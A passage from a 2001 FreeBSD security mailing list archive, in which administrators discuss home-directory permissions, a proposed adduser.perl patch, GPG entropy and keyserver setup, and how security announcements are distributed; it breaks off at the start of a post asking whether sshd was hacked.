should be protected the same way. Am I wrong? --=20 Players win and winners play Have a lucky day --DocE+STaALJfprDB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1i iQCVAwUBOt2nHvD9M5lef5W3AQE7ngP+KrDP/FA3jsdzYLNCHAX+Fi6Zqxj6LSwX YoiJaU/9r/OHmp3GIC0Cv/etBU0q3IrZGNbsxYcjYlwyq/7oPXqn8jFUIcwtL1gI cRhe0eXPozGb1JH3RcGu13Bm3bQcKsp8NTbHvtXzfEe6HUeHTJ6HsTBfvgGx+tpx /B1x+nzzPdo= =8Gj0 -----END PGP SIGNATURE----- --DocE+STaALJfprDB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 8:28:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from calliope.cs.brandeis.edu (calliope.cs.brandeis.edu [129.64.3.189]) by hub.freebsd.org (Postfix) with ESMTP id 79E4C37B61C for ; Wed, 18 Apr 2001 08:28:10 -0700 (PDT) (envelope-from meshko@calliope.cs.brandeis.edu) Received: from localhost (meshko@localhost) by calliope.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA31520; Wed, 18 Apr 2001 11:27:42 -0400 Date: Wed, 18 Apr 2001 11:27:42 -0400 (EDT) From: Mikhail Kruk To: Victor Ivanov Cc: Subject: Re: /root and users home dir permissions In-Reply-To: <20010418173927.A64529@icon.icon.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hi all, > > I noticed /root is installed with mode=0755 (and updated every time by > installworld). It's the root home directory... some admins (like me) are > using it for keeping sensitive data away from regular users. Shouldn't it > be mode=0700 in /etc/mtree/BSD.root.dist? I don't think changes like this can be made all of a sudden. Some people might be using /root for something which requires it to be readable and we don't want to break things... > Also, when adding new users their home directories should be protected the > same way. Am I wrong? I strongly agree with that. This change seems to be ok in terms of breaking existing systems and people have no business in other users' directories. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 8:38:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from scribble.fsn.hu (scribble.fsn.hu [193.224.40.95]) by hub.freebsd.org (Postfix) with SMTP id 940A637B42C for ; Wed, 18 Apr 2001 08:38:32 -0700 (PDT) (envelope-from bra@fsn.hu) Received: (qmail 56609 invoked by uid 1000); 18 Apr 2001 15:38:24 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 Apr 2001 15:38:24 -0000 Date: Wed, 18 Apr 2001 17:38:24 +0200 (CEST) From: Attila Nagy To: Mikhail Kruk Cc: Victor Ivanov , Subject: Re: /root and users home dir permissions In-Reply-To: Message-ID: <20010418173737.H50883-100000@scribble.fsn.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, > > Also, when adding new users their home directories should be protected the > > same way. Am I wrong? > I strongly agree with that. This change seems to be ok in terms of > breaking existing systems and people have no business in other users' > directories. I think sysinstall now has such a button, so this can be enabled during the install. -------------------------------------------------------------------------- Attila Nagy e-mail: Attila.Nagy@fsn.hu Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194) H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 8:47:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id 42D7037B422 for ; Wed, 18 Apr 2001 08:47:50 -0700 (PDT) (envelope-from fbsd-secure@ursine.com) Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f3IFlnT56615 for ; Wed, 18 Apr 2001 08:47:49 -0700 (PDT) (envelope-from fbsd-secure@ursine.com) Message-ID: <3ADDB725.56C1BE83@ursine.com> Date: Wed, 18 Apr 2001 08:47:49 -0700 From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: Latency of security notifications References: <200104180245.f3I2jtT17721@drugs.dv.isc.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mark.Andrews@nominum.com wrote: > Michael Bryan wrote: > > The FreeBSD security team has been notified of a problem > > with XYZ. An official security announcement will be forthcoming > > shortly with the recommended fixes. In the meantime, please > > subscribe to and read the freebsd-security mailing list for the > > latest news on this issue. > > This approach doesn't work. I was not on the freebsd-security > list when the ntpd bugtraq message went out. I found it > impossible to see the *recent* traffic on the list that I > had missed. > > This is not to say that it can't be made to work. Just that > we are not at a stage were this is the correct response. Does this address your concern? I see all recent list traffic here, including your message: http://docs.freebsd.org/mail/current/freebsd-security.html The "early alert" message could easily include that URL, which would help people find any recent discussion missed before subscribing. (Or just view via the web interface without even subscribing.) Mail from previous weeks can be found here: http://docs.freebsd.org/mail/archive/2001/freebsd-security/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 9:31: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 8B0A437B422 for ; Wed, 18 Apr 2001 09:31:01 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 9854 invoked by uid 1000); 18 Apr 2001 16:31:21 -0000 Date: Wed, 18 Apr 2001 18:31:21 +0200 From: "Karsten W. Rohrbach" To: James Greenfield Cc: freebsd-security@FreeBSD.ORG Subject: Re: GPG and "Not enough random bytes available" Message-ID: <20010418183121.D8026@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , James Greenfield , freebsd-security@FreeBSD.ORG References: <026a01c0c780$e4ab3260$4501a8c0@boubou> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <026a01c0c780$e4ab3260$4501a8c0@boubou>; from james@pagearts.co.za on Tue, Apr 17, 2001 at 10:56:36PM +0200 X-Arbitrary-Number-Of-The-Day: 42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org insert the follwing into ~/.gnupg/options load-extension rndunix then it not ask you any questions. i do not know the implications on the quality of random generated, could somebody deeper into gnupg's intrinsics please comment on this? /k James Greenfield(james@pagearts.co.za)@2001.04.17 22:56:36 +0000: > ----------------------------------------- (on router.pagearts.co.za) > > Mail scanned with Trend Antivirus Interscan Viruswall > > --------------------------------------------------------- > I've just installed GPG 1.0.4 on FreeBSD 4.2-RELEASE. > > Any attempt to generate a keypair results in a message to the effect of "Not > enough random bytes available". Regardless of how much work I make the > system do it doesn't seem to do anything more, GPG just sits there with a > blank expression on its face. > > Some searches on the Web seem to indicate a possible patch to clock.c that > may be the cause of this problem? What's of some concern to me is that all > the threads around this issue seem to indicate that it should require no > more than about 24 bytes of random data, but the message displayed indicates > that 300 bytes more are required. This seems like an awful lot of random > data. > > The messages above also seemed to indicate that a reboot may result in > enough random data for a couple of email messages, but that seems pretty > drastic. > > I realise that there are probably better places to search for this info, but > I'm just getting into FreeBSD again and this is the first time I've been in > a position where I can actively maintain a server that's online (admittedly > not a particularly high profile one, but we've had a couple of people poking > around already, nothing like learning on the job :) > > Regards > James Greenfield -- > Hugh Hefner is a virgin. KR433/KR11-RIPE -- http://www.webmonster.de -- ftp://ftp.webmonster.de [Key] [KeyID---] [Created-] [Fingerprint-------------------------------------] GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10: 3:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 8CB8B37B423 for ; Wed, 18 Apr 2001 10:03:39 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1497 invoked by uid 1000); 18 Apr 2001 17:02:06 -0000 Date: Wed, 18 Apr 2001 20:02:06 +0300 From: Peter Pentchev To: Mikhail Kruk Cc: Victor Ivanov , freebsd-security@FreeBSD.ORG Subject: Re: /root and users home dir permissions Message-ID: <20010418200206.C582@ringworld.oblivion.bg> Mail-Followup-To: Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.ORG References: <20010418173927.A64529@icon.icon.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from meshko@cs.brandeis.edu on Wed, Apr 18, 2001 at 11:27:42AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org CC'd to -arch, although I guess most of the people interested are already on -security anyway.. On Wed, Apr 18, 2001 at 11:27:42AM -0400, Mikhail Kruk wrote: > > Hi all, > > > > I noticed /root is installed with mode=0755 (and updated every time by > > installworld). It's the root home directory... some admins (like me) are > > using it for keeping sensitive data away from regular users. Shouldn't it > > be mode=0700 in /etc/mtree/BSD.root.dist? > > I don't think changes like this can be made all of a sudden. Some people > might be using /root for something which requires it to be readable and we > don't want to break things... > > > Also, when adding new users their home directories should be protected the > > same way. Am I wrong? > > I strongly agree with that. This change seems to be ok in terms of > breaking existing systems and people have no business in other users' > directories. OK, I think Victor shall cede the /root case - after all, we're all free to make local mods to the mtree files and all, right? :) About adduser.. what do people think about the attached patch? Or should that ugly regexp also check for numeric modes? G'luck, Peter -- This sentence contains exactly threee erors. Index: src/usr.sbin/adduser/adduser.perl =================================================================== RCS file: /home/ncvs/src/usr.sbin/adduser/adduser.perl,v retrieving revision 1.45 diff -u -r1.45 adduser.perl --- src/usr.sbin/adduser/adduser.perl 2001/04/17 09:42:07 1.45 +++ src/usr.sbin/adduser/adduser.perl 2001/04/18 16:59:19 @@ -39,6 +39,7 @@ $config_read = 1; # read config file $logfile = "/var/log/adduser"; # logfile $home = "/home"; # default HOME + $home_perm = "u+wrX,go-w"; # default permissions on HOME $etc_shells = "/etc/shells"; $etc_passwd = "/etc/master.passwd"; $group = "/etc/group"; @@ -219,6 +220,33 @@ return 0; } +# return the default permissions' string for HOME +sub home_permissions { + local($perm) = @_; + local($p) = $perm; + + return $p if !$verbose && $p eq &home_permissions_valid($p); + + while(1) { + $p = &confirm_list("Enter your default HOME permissions:", 1, $perm, ""); + last if $p eq &home_permissions_valid($p); + } + + $changes++ if $p ne $perm; + return $p; +} + +# check for valid permissions +sub home_permissions_valid { + local($perm) = @_; + + if ($perm =~ /^((([ugo]+[+-][rwxX]+),?)+)/) { + return $1; + } else { + return ""; + } +} + # check for valid passwddb sub passwd_check { system("$pwd_mkdb -C $etc_passwd"); @@ -939,16 +967,17 @@ if (!mkdir("$homedir", 0755)) { warn "$dir: $!\n"; return 0; } - system 'chown', "$name:$group", $homedir; + system("chmod", "$home_perm", "$homedir"); + system("chown", "$name:$group", "$homedir"); return !$?; } # copy files from $dotdir to $homedir # rename 'dot.foo' files to '.foo' print "Copy files from $dotdir to $homedir\n" if $verbose; - system("cp -R $dotdir $homedir"); - system("chmod -R u+wrX,go-w $homedir"); - system("chown -R $name:$group $homedir"); + system("cp", "-R", "$dotdir", "$homedir"); + system("chmod", "-R", "$home_perm", "$homedir"); + system("chown", "-R", "$name:$group", "$homedir"); # security opendir(D, $homedir); @@ -1332,6 +1361,9 @@ # default HOME directory ("/home") home = "$home" +# default permissions on HOME ("u+wrX,go-w") +home_perm = "$home_perm"; + # List of directories where shells located # path = ('/bin', '/usr/bin', '/usr/local/bin') path = ($shpath) @@ -1391,6 +1423,7 @@ &shells_add; # maybe add some new shells $defaultshell = &shell_default; # enter default shell $home = &home_partition($home); # find HOME partition +$home_perm = &home_permissions($home_perm); # set HOME permissions $dotdir = &dotdir_default; # check $dotdir $send_message = &message_default; # send message to new user $defaultpasswd = &password_default; # maybe use password To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10: 6:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id DD55E37B424 for ; Wed, 18 Apr 2001 10:06:21 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1539 invoked by uid 1000); 18 Apr 2001 17:04:49 -0000 Date: Wed, 18 Apr 2001 20:04:49 +0300 From: Peter Pentchev To: Mikhail Kruk Cc: Victor Ivanov , freebsd-security@FreeBSD.org, freebsd-arch@FreeBSD.org Subject: Re: /root and users home dir permissions Message-ID: <20010418200449.D582@ringworld.oblivion.bg> Mail-Followup-To: Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.org, freebsd-arch@FreeBSD.org References: <20010418173927.A64529@icon.icon.bg> <20010418200206.C582@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010418200206.C582@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, Apr 18, 2001 at 08:02:06PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, so I forgot to CC it to -arch :) So here we go again :) G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. On Wed, Apr 18, 2001 at 08:02:06PM +0300, Peter Pentchev wrote: > CC'd to -arch, although I guess most of the people interested are > already on -security anyway.. > > On Wed, Apr 18, 2001 at 11:27:42AM -0400, Mikhail Kruk wrote: > > > Hi all, > > > > > > I noticed /root is installed with mode=0755 (and updated every time by > > > installworld). It's the root home directory... some admins (like me) are > > > using it for keeping sensitive data away from regular users. Shouldn't it > > > be mode=0700 in /etc/mtree/BSD.root.dist? > > > > I don't think changes like this can be made all of a sudden. Some people > > might be using /root for something which requires it to be readable and we > > don't want to break things... > > > > > Also, when adding new users their home directories should be protected the > > > same way. Am I wrong? > > > > I strongly agree with that. This change seems to be ok in terms of > > breaking existing systems and people have no business in other users' > > directories. > > OK, I think Victor shall cede the /root case - after all, we're all free > to make local mods to the mtree files and all, right? :) > > About adduser.. what do people think about the attached patch? > Or should that ugly regexp also check for numeric modes? Index: src/usr.sbin/adduser/adduser.perl =================================================================== RCS file: /home/ncvs/src/usr.sbin/adduser/adduser.perl,v retrieving revision 1.45 diff -u -r1.45 adduser.perl --- src/usr.sbin/adduser/adduser.perl 2001/04/17 09:42:07 1.45 +++ src/usr.sbin/adduser/adduser.perl 2001/04/18 16:59:19 @@ -39,6 +39,7 @@ $config_read = 1; # read config file $logfile = "/var/log/adduser"; # logfile $home = "/home"; # default HOME + $home_perm = "u+wrX,go-w"; # default permissions on HOME $etc_shells = "/etc/shells"; $etc_passwd = "/etc/master.passwd"; $group = "/etc/group"; @@ -219,6 +220,33 @@ return 0; } +# return the default permissions' string for HOME +sub home_permissions { + local($perm) = @_; + local($p) = $perm; + + return $p if !$verbose && $p eq &home_permissions_valid($p); + + while(1) { + $p = &confirm_list("Enter your default HOME permissions:", 1, $perm, ""); + last if $p eq &home_permissions_valid($p); + } + + $changes++ if $p ne $perm; + return $p; +} + +# check for valid permissions +sub home_permissions_valid { + local($perm) = @_; + + if ($perm =~ /^((([ugo]+[+-][rwxX]+),?)+)/) { + return $1; + } else { + return ""; + } +} + # check for valid passwddb sub passwd_check { system("$pwd_mkdb -C $etc_passwd"); @@ -939,16 +967,17 @@ if (!mkdir("$homedir", 0755)) { warn "$dir: $!\n"; return 0; } - system 'chown', "$name:$group", $homedir; + system("chmod", "$home_perm", "$homedir"); + system("chown", "$name:$group", "$homedir"); return !$?; } # copy files from $dotdir to $homedir # rename 'dot.foo' files to '.foo' print "Copy files from $dotdir to $homedir\n" if $verbose; - system("cp -R $dotdir $homedir"); - system("chmod -R u+wrX,go-w $homedir"); - system("chown -R $name:$group $homedir"); + system("cp", "-R", "$dotdir", "$homedir"); + system("chmod", "-R", "$home_perm", "$homedir"); + system("chown", "-R", "$name:$group", "$homedir"); # security opendir(D, $homedir); @@ -1332,6 +1361,9 @@ # default HOME directory ("/home") home = "$home" +# default permissions on HOME ("u+wrX,go-w") +home_perm = "$home_perm"; + # List of directories where shells located # path = ('/bin', '/usr/bin', '/usr/local/bin') path = ($shpath) @@ -1391,6 +1423,7 @@ &shells_add; # maybe add some new shells $defaultshell = &shell_default; # enter default shell $home = &home_partition($home); # find HOME partition +$home_perm = &home_permissions($home_perm); # set HOME permissions $dotdir = &dotdir_default; # check $dotdir $send_message = &message_default; # send message to new user $defaultpasswd = &password_default; # maybe use password To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10:41:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from cody.jharris.com (cody.jharris.com [205.238.128.83]) by hub.freebsd.org (Postfix) with ESMTP id 7CB5337B422 for ; Wed, 18 Apr 2001 10:41:14 -0700 (PDT) (envelope-from nick@rogness.net) Received: from localhost (nick@localhost) by cody.jharris.com (8.11.1/8.9.3) with ESMTP id f3IIlaY82142; Wed, 18 Apr 2001 13:47:36 -0500 (CDT) (envelope-from nick@rogness.net) Date: Wed, 18 Apr 2001 13:47:36 -0500 (CDT) From: Nick Rogness X-Sender: nick@cody.jharris.com To: Mikhail Kruk Cc: Victor Ivanov , freebsd-security@FreeBSD.ORG Subject: Re: /root and users home dir permissions In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Apr 2001, Mikhail Kruk wrote: > > Hi all, [snip] > > > Also, when adding new users their home directories should be > protected the > same way. Am I wrong? > What about webservers and ~$username access, a better mode for that may be 701 maybe? Of course, I could be wrong. Nick Rogness - Keep on Routing in a Free World... "FreeBSD: The Power to Serve!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10:45: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 0CB3937B423 for ; Wed, 18 Apr 2001 10:45:06 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 2042 invoked by uid 1000); 18 Apr 2001 17:43:32 -0000 Date: Wed, 18 Apr 2001 20:43:32 +0300 From: Peter Pentchev To: Nick Rogness Cc: Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.ORG Subject: Re: /root and users home dir permissions Message-ID: <20010418204332.E582@ringworld.oblivion.bg> Mail-Followup-To: Nick Rogness , Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from nick@rogness.net on Wed, Apr 18, 2001 at 01:47:36PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 18, 2001 at 01:47:36PM -0500, Nick Rogness wrote: > On Wed, 18 Apr 2001, Mikhail Kruk wrote: > > > > Hi all, > [snip] > > > > > Also, when adding new users their home directories should be > > protected the > same way. Am I wrong? > > > > What about webservers and ~$username access, a better mode for > that may be 701 maybe? Of course, I could be wrong. I personally like 751.. G'luck, Peter -- Nostalgia ain't what it used to be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 11:26:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id 3626937B423 for ; Wed, 18 Apr 2001 11:26:30 -0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from sjohn.airlinksys.com (unknown [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 0FB6753501 for ; Wed, 18 Apr 2001 13:26:17 -0500 (CDT) Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id DEE775DDA; Wed, 18 Apr 2001 13:26:15 -0500 (CDT) Date: Wed, 18 Apr 2001 13:26:15 -0500 From: Scott Johnson To: freebsd-security@freebsd.org Subject: Re: PGP public keys Message-ID: <20010418132615.A11484@ns2.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@freebsd.org References: <01041813295506.00414@sentry.granch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01041813295506.00414@sentry.granch.com>; from shelton@sentry.granch.ru on Wed, Apr 18, 2001 at 01:29:55PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoth Rashid N. Achilov on Wed, Apr 18, 2001 at 01:29:55PM +0700: > I have just installed GPG. As mirrored in doc, I put my public key on my web > page (rest is under construction :-)) ). But where can I find public keys for > people? Is there any keyserver? As mentioned by others, you can use pgp.mit.edu. If you put the line keyserver pgp.mit.edu in ~/.gnupg/options gpg can grab keys as needed. I use gpg with mutt, and gpg grabs public keys for signed messages automatically. -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 12:16: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id EB98737B423 for ; Wed, 18 Apr 2001 12:16:02 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 3322 invoked by uid 0); 18 Apr 2001 19:16:00 -0000 Received: from p3ee2160d.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.13) by mail.gmx.net (mp007-rz3) with SMTP; 18 Apr 2001 19:16:00 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA10335 for freebsd-security@freebsd.org; Wed, 18 Apr 2001 21:04:25 +0200 Date: Wed, 18 Apr 2001 21:04:25 +0200 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: /root and users home dir permissions Message-ID: <20010418210425.S20830@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <20010418173927.A64529@icon.icon.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20010418173927.A64529@icon.icon.bg>; from v0rbiz@icon.bg on Wed, Apr 18, 2001 at 05:39:27PM +0300 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 18, 2001 at 17:39 +0300, Victor Ivanov wrote: > > I noticed /root is installed with mode=0755 (and updated every > time by installworld). It's the root home directory... some > admins (like me) are using it for keeping sensitive data away > from regular users. Shouldn't it be mode=0700 in > /etc/mtree/BSD.root.dist? a+rx on /root only means that this very directory can be listed and entered by anybody. There might be valid reasons for doing this (dotfiles to derive from? config files in copied form which are of general interest? although I don't think root should have a public_html tree. But definitely some people feel that /root should be 0755 -- otherwise the mtree config file would look different:). What keeps you from putting sensitive data into a directory one level deeper? It's basically what you do as a regular user, too. You simply keep the secret stuff away while still allowing access to the public and non sensitive stuff. > Also, when adding new users their home directories should be > protected the same way. Am I wrong? Yes. :) I've just been through it after moving to another server. People don't like getting stopped from looking at others' config skeletons and public data. And everyone quickly went to open up their $HOME. Maybe 711 would be more appropriate. Those who know where they want to go or which file they want to look at are free to do so (assuming the subdir or file is executable / readable). While those with no direction cannot list the content and look out for what could be of interest. But I'm afraid any configuration (completely closed, completely open, as well as between) will have opponents ... virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 13:38: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from smurftarget.net (netwarriors.org [216.34.142.180]) by hub.freebsd.org (Postfix) with ESMTP id 2A64037B424 for ; Wed, 18 Apr 2001 13:38:02 -0700 (PDT) (envelope-from loki@smurftarget.net) Received: from loki by smurftarget.net with local (Exim 3.20 #1) id 14pyhI-000JIi-00 for freebsd-security@freebsd.org; Wed, 18 Apr 2001 13:37:08 -0700 Date: Wed, 18 Apr 2001 13:37:08 -0700 From: Jonas Luster To: freebsd-security@freebsd.org Subject: Re: Latency of security notifications Message-ID: <20010418133708.A74145@netwarriors.org> Mail-Followup-To: Jonas Luster , freebsd-security@freebsd.org References: <3ADCF89E.14CD5D37@ursine.com> <200104180245.f3I2jtT17721@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104180245.f3I2jtT17721@drugs.dv.isc.org>; from Mark.Andrews@nominum.com on Wed, Apr 18, 2001 at 12:45:54PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Mark.Andrews@nominum.com sez: > > with XYZ. An official security announcement will be forthcoming > > shortly with the recommended fixes. In the meantime, please > > subscribe to and read the freebsd-security mailing list for the > > latest news on this issue. > > This approach doesn't work. I was not on the freebsd-security > list when the ntpd bugtraq message went out. I found it > impossible to see the *recent* traffic on the list that I > had missed. | For further information: | | * See the archived thread at | * See bugtraq at | and | * Subscribe to freebsd-security at | | The Security Officer will announce fixes and workarounds as they are | found and/or implemented. jonas -- I always find it amusing when two worlds supposedly built on logic (the law and digital computers) collide producing paradoxes which would make philosopher's lose their minds. ;-) --Chris Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 14:44:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id B1F9637B422 for ; Wed, 18 Apr 2001 14:44:20 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f3ILiCT30134; Thu, 19 Apr 2001 07:44:12 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104182144.f3ILiCT30134@drugs.dv.isc.org> To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG From: Mark.Andrews@nominum.com Subject: Re: Latency of security notifications In-reply-to: Your message of "Wed, 18 Apr 2001 08:47:49 MST." <3ADDB725.56C1BE83@ursine.com> Date: Thu, 19 Apr 2001 07:44:12 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Mark.Andrews@nominum.com wrote: > > Michael Bryan wrote: > > > The FreeBSD security team has been notified of a problem > > > with XYZ. An official security announcement will be forthcoming > > > shortly with the recommended fixes. In the meantime, please > > > subscribe to and read the freebsd-security mailing list for the > > > latest news on this issue. > > > > This approach doesn't work. I was not on the freebsd-security > > list when the ntpd bugtraq message went out. I found it > > impossible to see the *recent* traffic on the list that I > > had missed. > > > > This is not to say that it can't be made to work. Just that > > we are not at a stage were this is the correct response. > > Does this address your concern? I see all recent list traffic here, includin > g > your message: > > http://docs.freebsd.org/mail/current/freebsd-security.html > > The "early alert" message could easily include that URL, which would help > people find any recent discussion missed before subscribing. (Or just > view via the web interface without even subscribing.) > > Mail from previous weeks can be found here: > > http://docs.freebsd.org/mail/archive/2001/freebsd-security/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message This is a case of "if you know it is there you can find it". Mark -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 16:50:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13601.mail.yahoo.com (web13601.mail.yahoo.com [216.136.175.112]) by hub.freebsd.org (Postfix) with SMTP id 448E637B423 for ; Wed, 18 Apr 2001 16:50:08 -0700 (PDT) (envelope-from nictan72@yahoo.com.sg) Message-ID: <20010418235008.66296.qmail@web13601.mail.yahoo.com> Received: from [165.21.83.211] by web13601.mail.yahoo.com; Thu, 19 Apr 2001 07:50:08 CST Date: Thu, 19 Apr 2001 07:50:08 +0800 (CST) From: =?iso-8859-1?q?Nicholas=20Tan?= Subject: Re: sshd hacked? To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, This happened earlier, i'm running 4.2-stable: Apr 